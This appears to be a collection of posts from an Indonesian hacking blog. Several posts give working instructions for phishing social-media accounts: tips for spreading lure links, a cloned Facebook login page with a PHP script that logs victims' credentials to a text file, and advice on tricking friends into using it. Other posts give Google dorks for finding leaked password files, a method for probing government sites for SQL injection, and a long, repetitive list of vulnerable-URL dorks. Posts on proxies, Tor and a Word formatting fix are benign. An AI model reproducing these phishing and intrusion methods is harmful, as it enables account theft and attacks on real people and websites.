Trik dan Cara Jitu Teknik Phising Mendapat Banyak Korban

Kali ini saya akan share bagaimana mendapatkan akun menjebak korban dengan teknik phising.

Apa itu phising ? Phising adalah cara untuk mencoba mendapatkan informasi seperti username, password, dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau IT administrator biasanya digunakan untuk memikat publik tidak curiga. Phising biasanya dilakukan melalui e-mail spoofing atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian di sebuah website palsu yang tampilan dan nuansa yang hampir sama dengan yang aslinya

1. Gunakan Kata Kata Yang Menggiurkan / Menarik Perhatian

2. Rajin Share di Grup Grup Facebook 

3. Cari Partner Sebar Phising (Minimal 2) 

4. Setiap Nyebar Dikasih Jarak 5 Menit Biar Tidak Di Block Facebook 

5. Gunakan AUTOPOST agar tidak lelah Nyebar 

6. Kata Kata Lebih Baik Pendek

7. Sebar Di Grup Facebook Yang Membernya AKTIF

8. Sebar Di SOSIAL MEDIA yang lain ( LINE, INSTAGRAM, TWITTER, PATCH ) 

9. Sebar Phising Di POST / KOMENTAR ( GRUP FACEBOOK )

Sekian Artikel Dari Cyber Warriors👊 Semoga Bermanfaat!

Read More

Trik dan Cara Jitu Hidden IP Address, WORK!!!

Alamat IP adalah alamat Internet Protocol yang menghubungkan komputer atau router jaringan dengan ISP (Internet Service Provider). Setiap kali Anda mengunjungi Situs Web atau server lain di internet, alamat IP Anda dicatat atau direkam dalam file log atau disimpan pada server tersebut. Sehingga meninggalkan jejak akses log aktivitas internet Anda.

Tetapi jika Anda menyembunyikan IP Address maka server atau situs tidak bisa melacak lokasi Anda atau identitas Anda dan akan menyembunyikannya dari internet.

Internet penuh dengan scammer, spammer dan hacker. Mereka dapat dengan mudah melacak aktivitas online Anda dan mencuri informasi pribadi Anda dengan menerobos keamanan sistem Anda.

Di sisi lain penyedia layanan internet atau ISP (Internet Service Provider), mereka melacak dan selalu memata-matai Anda, memantau dan menyimpan semua kegiatan web Anda.

Jika Anda tidak mau semua hal ini terjadi, maka Anda dapat membaca artikel ini yaitu Cara Menyembunyikan IP Address sehingga Anda dapat berselancar di internet secara anonim sehingga tidak ada yang bisa melacak Anda atau memata-matai kegiatan berinternet Anda.

Mengapa Kita Perlu Menyembunyikan IP Address?

Ada banyak penyusup atau hacker di internet yang selalu mengawasi terus menerus semua kegiatan dari para pengguna internet. Mereka dapat melacak lokasi Anda atau memantau aktivitas Anda sehingga mereka dapat melanggar zona keamanan sistem Anda.

Tetapi jika Anda menyembunyikan Alamat IP Anda maka Anda tidak dapat dilacak oleh penyusup tersebut. Jadi, setiap kali Anda ingin membuka situs yang tidak diinginkan atau unwanted site, maka hal pertama yang harus dilakukan adalah menyembunyikan Alamat IP Anda. 

Namun tidak menjadi keharusan bahwa Anda harus selalu menyembunyikan Alamat IP Anda, hanya ketika Anda perlu atau mencoba untuk membuka situs yang tidak dipercaya. Ini mencegah Anda dari pelacakan oleh situs web atau menyembunyikan lokasi geografis Anda.

Metode Untuk Menyembunyikan Alamat IP Pada Windows PC:

1. Proxy Server Berbasis Web

Web proxy adalah solusi yang terbaik dan termudah di mana Anda dapat menyembunyikan alamat IP Anda dengan mudah. Ada banyak situs Web Proxy hanya pergi ke situs tersebut, dan silahkan melakukan penelusuran apa pun yang Anda inginkan, melalui webproxy, akan menyembunyikan IP Address asli Anda dan membiarkan Anda surfing di internet melalui server mereka sendiri. Jadi ini adalah solusi Bagaimana Anda Bisa Menyembunyikan Alamat IP Anda dan dapat berselancar secara anonim di internet. Ada beberapa situs Berbasis Web proxy diantaranya HideMyAss, kproxy, Proxify, anonymous. Silahkan Anda sesuaikan.

2. Gunakan VPN (Virtual jaringan pribadi) Perpanjangan & Software

VPN (Virtual Private Network) adalah cara lain dan terbaik untuk menyembunyikan Alamat IP Anda. Jika Anda berada di tempat kerja, sekolah atau perguruan tinggi, Buatlah new virtual private network seperti Ultra Surf, yaitu ekstensi VPN terbaik yang dapat Anda gunakan pada browser mozilla serta pada chrome, cukup instal ekstensi pada browser Anda dan tool tersebut akan menyembunyikan alamat IP atau mengubah lokasi Anda sehingga Anda dapat berselancar secara anonim di Internet. Hal ini juga akan membantu Anda untuk membuka situs yang diblokir di sekolah atau perguruan tinggi.

3. Gunakan Software IP Address Hiding

Metode sederhana lainnya adalah penggunaan IP Address Hide software. Anda dapat mencari di Google ada banyak software terbaik yang ada di internet yang dapat membantu Anda untuk menyembunyikan alamat IP Anda.

Perangkat lunak ini menyembunyikan Alamat IP Anda secara otomatis dan tidak perlu melakukan apa-apa hanya men-download dan install di PC / Laptop dan Anda dapat dengan aman surfinganonim di web. Ini benar-benar akan menyembunyikan alamat IP dari web dan tidak ada yang bisa melacak lokasi Anda atau memonitor Anda.

4. Mengubah IP Address Secara Manual

Anda dapat mengubah alamat IP Anda secara manual di browser Anda dan berselancar di internet secara anonim. Ada banyak situs yang menyediakan proxy yang segar dan baru, Anda hanya cukup memilih salah satu dari mereka dan ubah pengaturan browser Anda. Jika Anda belum tahu bagaimana melakukan ini maka Anda dapat mempelajarinya juga disini

Gunakan dengan bijak

Selamat mencoba sobat Cyber Warriors👊

Read More

Tutorial Merubah IP Address Browser Mozilla Firefox dan Google Chrome

IP Address atau Proxy Address adalah nomor tertentu yang diberikan oleh ISP untuk komputer Anda. Hal ini mengacu pada lokasi atau alamat komputer Anda atau dapat dikatakan itu adalah alamat dari komputer Anda di internet.

Setiap orang dapat menemukan lokasi Anda dengan bantuan alamat IP Anda. Tapi mengapa kita perlu mengubah alamat IP ? Karena mungkin saat di sekolah, perguruan tinggi dan lokasi yang berbeda lainnya, administrator memblokir beberapa situs dan kita tidak bisa mengakses situs-situs tersebut.

Misalnya seperti saat kuliah di perguruan tinggi kita tidak bisa membuka Facebook, YouTube atau situs lain karena administrator memblokir situs tersebut sehingga untuk membuka atau mengakses situs semacam ini kita harus menggunakan atau menambahkan proxy atau alamat IP baru.

Ada banyak metode untuk mengakses situs-situs yang diblokir, seperti proxy berbasis web (web proxy), menggunakan VPN dan lain-lain. Dan salah satu metode lain untuk mengubah alamat IP adalah secara manual di browser Anda jadi jika Anda tidak pernah mengubah pengaturan di browser Anda dan tidak tahu bagaimana perubahan IP atau alamat proxy secara manual maka di sini Saya akan mengajarkan Anda bagaimana untuk melakukan hal semacam ini.

Cara Mengganti IP Address Di Mozilla Firefox

§  Pertama Buka Mozilla Firefox >> Klik Tools >> kemudian Options.

§  Sekarang Anda akan melihat klik jendela baru Advanced >> Network >> Settings.

§  Maka akan ada jendela baru yang terbuka sekarang klik Manually Proxy Configuration dan kemudian menempatkan di kotak HTTP proxy dan Port juga

§  Dalam Connections setelah semua pengaturan di atas selesai , periksa pada Use this proxy for all protocolsharus dicentang.

§  Kemudian klik OK dan proxy Anda akan bekerja.

Cara Mengganti IP Address Di Google Chrome

§  Pertama buka Google Chrome Anda.

§  Di sudut kanan atas klik pada tombol Settings >> Kemudian dari daftar klik pada Settings. 

§  Anda akan melihat jendela gulir baru, turun dan klik pada Show Advanced settings.

§  Pada bagian Network temukan change proxy settings. 

§  Kemudian Anda akan melihat jendela Internet Properties kemudian klik pada tab Connections.

§  Setelah langkah di atas sekarang Anda akan melihat ada pilihan pengaturan untuk koneksi Dial up dan pengaturan LAN. 

§  Jika Anda menggunakan koneksi dial up kemudian pilih dari kotak dan klik pada pilihan settings di sisi kanan.

§  Tetapi jika Anda menggunakan koneksi LAN klik pada LAN settings. 

§  Sekarang Anda akan melihat kotak dialog baru dalam proses ini >> Pada bagian proxy server >> Centang pada use this proxy for LAN/Dial up connection. 

§  Sekarang Tambah alamat Proxy dan Port Anda.

§  Setelah itu centang pada Bypass proxy server for local addresses. 

§  Sekarang klik pada tombol save dan proxy Anda sudah bisa digunakan.

Selamat Mencoba Sobat Cyber Warriors👊 

Read More

Solusi Muncul Garis Pinggir dan Garis Bawah Saat Copy Paste Teks dari Website Blog Internet

Pernahkah anda mengalami kejadian ketika meng-copy dan paste artikel, naskah, atau teks dari internet, Web, atau Blog muncul garis di pinggir teks atau garis dibawah tulisan yang belum tahu cara menghilangkannya. Tenang sobat cyber warriors, Ane ada solusi nya

Berikut Caranya:
1. Blok pada teks yang muncul garisnya, atau berwarna gray atau abu-abu.
2. Lalu Klik kanan dan Pilih Accept Change.
Lebih jelasnya lihat gambar

3. Selesai dan lihat hasilnya

Mudahkan sobat
Semoga bermanfaat👊

Read More

Cara Ampuh Hack Semua Akun Media Sosial dengan Teknik Phising

Hack Semua Akun? memang bisa? Memang terlihat mustahil namun didunia ini tidak ada yang tidak mungkin selama kita mau berusaha dan berdo’a tentunya, hehe.. kali ini saya ingin membahas tentang cara hack semua akun, entah itu akun facebook, twitter, gmail, yahoo atau apapun selama akun tersebut memiliki halaman login kita bisa hack. saya akan jelaskan terlebih dahulu tentang teknik yang akan kita gunakan. Phising merupakan teknik hacking dengan melakukan pencurian informasi milik korban dengan cara memanfaatkan kelengahan user atau korban melalui halaman phising yang telah kita buat.

Fungsi dari halaman phising ini adalah mengalihkan perhatian korban sehingga korban nantinya mau login melalui halaman phising yang telah kita buat.

berikut merupakan cara hack menggunakan teknik phising:

1. Buka http://www.facebook.com (Jika anda ingin hack twitter tinggal masuk halaman login twitter begitu juga yahoo, intinya kita mendapatkan halaman login dari akun yang akan kita buat halaman phisingnya  )

2. Klik Kanan >> View Page Source atau tekan CTRL + U

3. Copy semua kode yang ada disitu kemudian paste ke notepad

4. Tekan CTRL + F kemudian cari kata action=

5..Ubah.action=”https://www.facebook.com/login.php?login_attempt=1”menjadi action=”facebook.php” .. Ubah juga method dari POST menjadi get

6. Simpan notepad ini dengan nama index.php

7. Buat notepad baru kemudian isikan kode berikut

<?php

header(“Location: http://www.Facebook.com/login.php “);

$handle = fopen(“pass.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan

8. Simpan Dengan Nama facebook.php

9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt

10. Kemudian Upload ke tiga file tersebut ke http://ripway.com atau ke alamat free hosting lainnya

11. Ubah permission pada file pass.txt menjadi 777 agar password dari akun korban dapat terbaca oleh system

Selesai membuat halaman phising dari facebook atau halaman akun korban tinggal kita pancing aja agar korban dapat masuk perangkap phising kita. Saya kasih tau cara paling mudah, jika korban merupakan teman anda maka anda bisa menjebak korban dengan cara merubah homepage browser milik korban dengan halaman phising kita deh. Setelah itu ya tinggal tunggu aja deh korban kita terperangkap, hehe..😎

Selamat mencoba sobat Cyber Warriors👊

Read More

Pengertian Deep Web dan Cara Aman Mengakses Dark Web

Selama ini kita sering mendengar istilah Berselancar di Dunia Maya, bukan ? Ketika berselancar kita hanya menyentuh permukaan lautnya saja. Di kedalamannya siapa yang tahu ? Kira kira begitulah gambaran Internet dan Deep Web (web dalam).

Pada kesempatan kali ini saya akan mencoba untuk menjelaskan pengertian Deep Web. Harapannya setelah membaca artikel ini kita tidak salah Kaprah lagi mengenai istilah Deep Web.

Apa itu Deep Web ?

Deep Web adalah kumpulan konten World Wide Web yang tidak terindex oleh mesin pencari standar (seperti Google, Bing, Yahoo).

Seperti namanya ‘Web Mendalam’ tidak terlihat dipermukaan.

Meskipun tidak terlihat, konten Deep Web tetap dapat diakses dengan menggunakan tool khusus.

Menurut hasil riset jumlah konten situs yang digolongkan sebagai Deep Web sangatlah banyak. Hampir 96% dari keseluruhan Internet. Artinya situs yang biasa kita akses seperti Facebook, Google dll itu hanya 4% nya saja.

Menurut hasil riset pula sebagian besar konten DeepWeb berisi tentang database dari hasil penelitian.

Namun di indonesia ternyata banyak yang salah kaprah tentang hal ini.

Karena hampir semua blog berbahasa indonesia menggambarkan Deep Web sama persis, yaitu sebagai kumpulan situs yang mengandung konten konten negatif dimana terdapat banyak kengerian di dalamnya, juga tempat berkumpulnya Hacker sehingga anda harus selalu berhati hati.

Pertanyaannya, Benarkah jumlah situs Deep Web demikian begitu besar? apakah terpintas di benak anda bahwa ada yang salah tentang hal tersebut?

Pertanyaan-pertanyaan yang saya daftar di bawah ini mungkin dapat membantu anda untuk mencerna informasi itu.

• Lebih banyak mana foto yang diupload di internet oleh jutaan orang setiap harinya di banding data riset orang orang khusus?
• Jika deep web adalah kumpulan situs dengan konten tidak normal maka lebih banyak mana jumlah orang orang seperti itu dibanding blogger yang jutaan jumlahnya?
• Dari semua teman anda, berapa orang yang menjadi peretas atau golongan psikopat? bahkan psikopat belum tentu bisa membuat tempatnya sendiri di deepweb, bahkan kebanyakan Hacker juga bermain di forum surface web.

Jadi jelas ada kesalah pahaman disini. 

Pengertian Deep Web Sebenarnya

Di dalam Deep Web memang ada beberapa situs pornografi, jual beli narkotika, situs kekerasan, peretasan. Hampir semuanya dari situs Deep Web yang kita kenal berdomain dot onion.

Namun sebenarnya situs berdomain dot onion tersebut bukan Deep Web secara keseluruhan.

Dot Onion cuma sebagian kecil dari Deep Web yang bisa kita sebut Dark Web atau sisi gelapnya internet.

Situs berdomain Onion terhubung ke internet melalui jaringan TOR atau Jaringan Bawang. Untuk mengaksesnya memerlukan tool khusus sehingga bisa digolongkan sebagai Deep Web. Jangan kaget, Jumlahnya hanya 0,3 % dari total keseluruhan web. Sangat sangat kecil.

Deep web adalah seperti yang sebelumnya sudah dijelaskan, yaitu kumpulan situs yang tidak terindex oleh mesin pencari umum.

Artinya private message facebook anda pun adalah bagian dari DeepWeb karena tidak terindex oleh mesin pencari.

Jika saya membuat sebuah situs yang hanya bisa di akses oleh jaringan kantor saja maka situs tersebut juga bisa di golongkan sebagai Deep Web karena untuk dapat mengaksesnya anda harus masuk ke jaringan lokal terlebih dahulu.

Oleh karena itu lah besaran kapasitas Deepweb dikatakan sangat besar oleh para ahli. Meskipun sangat besar Deep Web tidak bisa dikatakan sebagai Internet yang Sebenarnya karena kebanyakan isinya adalah penunjang Web bagian atas.

Jika di ibaratkan internet bagian atas adalah wajah dan halaman toko yang bisa anda lihat sedangkan gudang gudang privasi di belakangnya termasuk Deep Web.

Sebagian lainnya lagi merupakan toko toko gelap yang tidak memiliki halaman depan yang bisa di kategorikan sebagai Dark Web.

Uniknya ramai ramai digambarkan bahwa seluruhnya dari Deep Web itu tadi bisa dijumpai dalam situs berdomain onion.

Penggambaran tentang jumlah .onion yang salah kaprah tersebut turut serta membuat nama Deep Web begitu melegenda. Seolah olah Internet yang sebenarnya adalah Deep Web karena jumlahnya yang sangat besar.

Sampai sampai banyak dari mereka yang rasa ingin tahu nya tinggi ingin mencoba memasuki Deep Web ini (yang sebenarnya adalah Dark Web).

Dark Web adalah kumpulan web dalam yang merupakan bagian kecil dari Deep Web. Untuk mengaksesnya kita memerlukan tool dan jalur khusus. Sebut saja salah satunya TOR Network.

Penjelasan Jaringan TOR dan Cara Mengakses Deep Web (Dark Web)

Jaringan TOR (the onion router) atau bisa disebut jaringan bawang adalah server yang membuat pengguna menjadi anonim di internet.

Tor bekerja dengan cara mengarahkan lalu lintas internet anda ke lebih dari 3 relay sebelum sampai ke tujuan.

Pengertian sederhananya komputer anda akan melalui komputer komputer lain secara acak minimal hingga 3 dari 4000 lebih komputer sukarelawan di dalam jaringan TOR untuk dapat mengakses sebuah situs.

Karena keamanan berlapis tersebutlah jaringan ini disebut sebagai jaringan bawang.

Identitas kita tidak dapat di ketahui sehingga bisa dipastikan kita tidak terlacak ketika memakainya. Namun begitu data yang kita kirimkan tetap tidak terjaga keamanannya karena Jaringan TOR hanya melakukan Enkripsi data sampai ke pintu keluar ‘exit relay’.

Jaringan TOR di ceritakan kedalam Film MR.Robot Episode 1.

Elliot berhasil membuka kedok seorang pengedar konten sex dibawah umur dengan cara mengontrol Exit Node/relay dari jaringan TOR.

Mungkin anda penasaran kenapa DeepWeb (Dark Web) itu ada?

Situs berdomain dot onion hadir sebagai bentuk perwujudan terkumpulnya situs situs yang berlawanan dengan hukum namun tetap bisa bebas di akses melalui jalur khusus.

Pemilik site berdomain onion pastilah orang orang yang identitasnya tidak ingin di ketahui. Jika mereka publikasikan web mereka di Internet maka habislah mereka karena gampang terdeteksi dan gampang dilacak.

Cara mengakses Deep Web (Dark Web) tersebut salah satunya adalah dengan menggunakan TOR Browser yang bisa di download di TorProject.

Ketika menggunakan Tor Browser anda bisa membuat identitas sendiri dengan membuat virtual IP Address sehingga IP sebenarnya tetap dirahasiakan.

Jika merasa belum aman anda juga bisa membuat tor browser terkoneksi ke proxy / vpn anda terlebih dahulu. Dengan demikian tidak hanya IP Address kita yang di sembunyikan namun juga fakta bahwa anda yang sedang memakai jaringan TOR.

Beberapa tips ini akan membuat anda aman ketika memasuki dark web :

• Jangan mendaftarkan email, username dan password anda jika informasi tersebut sama dengan yang anda gunakan pada akun akun berharga anda. Buatlah email khusus jika perlu.
• Jangan mengaktifkan atau mendownload plugin pada tor Browser. Defaultnya tor browser mengaktifkan fitur noscript yang akan menonaktifkan semua plugin yang dapat menjalankan script, misalnya javascript. Tujuannya adalah agar browser anda tidak tereksploitasi program jahat seperti BeEF (browser anda akan dikuasai jika suatu situs menjalankan BeEFing, syaratnya hanya jika browser anda menjalankan satu script saja.. Efeknya ? Pencurian cookies dan sebagainya). Anda bisa saja mengaktifkan plugin dan dalam bahaya, tapi ketika anda sudah mengerti untuk tidak mengaktifkannya maka anda AMAN.
• Jangan mendownlod konten di dalam Deep Web dan langsung mengeksekusinya ketika masih online. Tidak ada jaminan file yang akan anda ambil itu aman dari virus. Browser Tor hanya mengamankan identitas anda saja. Beberapa file mungkin adalah trojan. Anda melihatnya dengan format jpg, png dan sebagainya namun ketika di eksekusi malah seperti exe. Maka jika menemui yang seperti itu jangan lanjutkan penginstallan. Backdoor selalu disisipkan kedalam program yang harus anda install atau jalankan.
• Jangan mendownload melalui torrent di deepweb. Mengapa ? Ketika kita mendownload menggunakan torrent, komputer kita akan terhubung langsung dengan komputer dimana filenya berasal sehingga percuma saja anda menggunakan jaringan bawang.
• Ketika anda mengikuti saran diatas, tidak perlu lagi berlebihan seperti Menutup Kamera Laptop Anda segala saat memasuki Dark Web. Untuk mengakses laptop anda Hacker memerlukan setidaknya IP Address. Sedangkan IP anda sudah disembunyikan oleh TOR. Atau….. hacker harus menunggu kewaspadaan anda hilang dan menginstall backdoor. Berapa waktu dan tenaga yang terbuang untuk melihat wajah kita yang tidak begitu penting? Keamanan kita sudah berlapis lapis.
• Mengerti exitnode jaringan bawang. Pada komputer (relawan) paling akhir di JARINGAN TOR data kita tidak di enkripsi. Disini si exitnode bisa saja menjalankan man in the middle attack (meskipun paling paling hanya segelintir dari ribuan). Intinya data anda tidak aman jika koneksi yang dilewati tidak menggunakan https. Jadi saran saya, hanya gunakan tor network ketika ingin mengakses dark web saja. Untuk internetan biasa jika bukan jalur aman (https) jangan menggunakan tor network.

Apa saja yang bisa kita temukan di Deep Web ?

Ketika memasuki Deep web anda mungkin akan merasa tersesat karena tidak memiliki peta alamat sebagai acuan. Tenang, ada Hiden Wiki kok. Silahkan menggunakan pencarian di hiden wiki pada Tor Browser.

Didalam hidden wiki sudah terdaftar situs situs berbahaya seperti slickroad dimana didalamnya terdapat penjualan narkoba, site yang memperdagangkan konten sex dibawah umur, pembunuhan dan lain sebagainya.

Situs tersebut dibuat untuk tujuan komersial. Biasanya mata uang yang dipergunakan di dalam Dark Web adalah Mata uang virtual. Bitcoin adalah salah satunya.

Sebagai catatan, url berdomain onion selalu di tulis agak acak, seperti jdsaph45jnsoijda dot onion. Jadi, tidak seperti alamat alamat web biasanya yang mudah di ingat. Alasannya ? coba anda tebak sendiri.

Sekarang sudah mengertikah anda tentang pengertian Deep Web dan apa itu Dark Web yang sebenarnya?

Read More

Cara Mendapatkan Ratusan Akun Facebook yang Kena Phising

Pada artikel ane kali ini, ane akan membahas tentang phising. Tapi bukan tentang cara buat akun phising karena itu udah saya bahas pada postingan saya sebelumnya. Terus mau bahas apa emangnya ? Kali ini saya mau bahas tentang cara mendapatkan list akun facebook yang telah menjadi korban phising. Bisa dibayangin kan berapa banyak akun yang bisa kita dapatkan.

Ane sarankan agar anda membaca dulu artikel ane tentang hack akun facebook dengan teknik phising, jadi anda bisa paham maksud dari artikel ini..  

Senjata yang akan kita gunakan hanya satu yaitu Google

Lanjud ke proses:

Dork:

intext:charset_test= email= default_persistent=

inurl:”passes” OR inurl:”passwords” OR inurl:”credentials” -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff

1. Pilih salah satu dari dua dork diatas lalu cari melalui google

2. Akan muncul tampilan seperti di bawah ini

3. Pilih salah satu tapi yang berakhiran .txt, contoh: http://www.photobsess.com/fotopengantin.com.my/passes.txt

4. Selesai

Gunakan dengan bijak

Selamat Mencoba Sobat Cyber Warriors👊 

Read More

Cara Jitu Menemukan Celah Spesifik Website dengan Spesifik Domain

Dalam postingan sebelumnya, Ane menjelaskan tentang cara hack websiste dengan dengan teknik SQLInjection secara manual. Pada kesempatan kali ini saya akan membahas tentang bagaimana cara kita untuk menemukan vulnerability atau celah dalam spesifik website dengan spesifik domain, seperti .gov(Government websites), .edu(Educational websites), .org(Organizational websites), .com(Commercial websites), .info(Informative websites) .net(Networking websites) dll.

Jika kita sudah pernah melakukan SQL Injection pasti kita sudah tahu bahwa untuk menemukan website yang akan kita jadikan target maka diperlukan dork. Namun target yang muncul nantinya akan sangat banyak dan tentunya hasilnya masih acak, terus bagaimana cara agar kita bisa menemukan celah dalam domain tertentu, berikut ini adalah penjelasan singkatnya:

Oke, setelah kita mengetahui spesifik domain, mari kita buat dork dengan formula berikut:

inurl:.”domain”/”dorks”

penjelasan:

“inurl” = input URL

“domain” = domain yang diinginkan, contoh:  .gov

“dorks” = dork yang biasa kita pakai

Ane misalkan kita ingin mencari celah dalam website pemerintahan, maka kita bisa rubah dork diatas menjadi:

inurl:.gov/index.php?id=

Setelah kita menemukan target, kita cek apakah website tersebut dapat kita hack atau tidak dengan menambahkan tanda (‘) di akhir url web target.

contoh: http://www.target.com/category.php?id=5‘

Jika website tersebut memiliki celah untuk di hack, maka akan muncul pesan error:

” Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\\\’ ORDER BY date_added DESC’ at line 1 “

Kalau sudah seperti ini anda tinggal pilih mau hack pake havij atau cara manual 

Sekian postingan kali ini, gunakan dengan bijak

Selamat Mencoba Sobat Cyber Warriors👊 

Read More

Tutorial Hack Website dengan Teknik SQL Injection

SQL Injection merupakan cara hack website yang paling banyak digunakan oleh para hacker. Kenapa? Karena dengan melakukan SQL injection, kita dapat langsung mengetahui username dan password dari website yang akan kita bajak.

Dibawah ini merupakan kumpulan dork yang dapat kita gunakan untuk mencari error dalam suatu website yang nantinya akan kita gunakan sebagai target SQL Injection.

Dork:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
